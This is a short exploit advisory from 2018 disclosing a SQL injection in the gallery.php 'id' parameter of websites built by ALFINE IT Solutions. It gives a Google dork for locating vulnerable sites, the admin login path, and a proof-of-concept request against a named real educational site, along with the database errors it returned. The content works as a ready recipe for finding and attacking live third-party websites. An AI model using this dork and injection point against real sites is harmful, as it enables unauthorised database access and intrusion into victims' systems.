#################################################################################################
# Exploit Title : AlfineSolutions.Com Web Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : alfinesolutions.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered By ALFINE IT Solutions''
# Exploit : /gallery.php?id=[SQL Inj]
# Admin Login Panel => /admin/index.php
#################################################################################################
# Example Site => bapujidental.edu/gallery.php?id=7%27 => [ Proof of Concept ] =>
# SQL Database Error =>
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/localhost.localdomain.com/bapujidental.edu/gallery.php on line 799
Notice: Undefined variable: dprt in /var/www/vhosts/localhost.localdomain.com/bapujidental.edu/gallery.php on line 821
Notice: Undefined variable: dprt in /var/www/vhosts/localhost.localdomain.com/bapujidental.edu/gallery.php on line 823
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################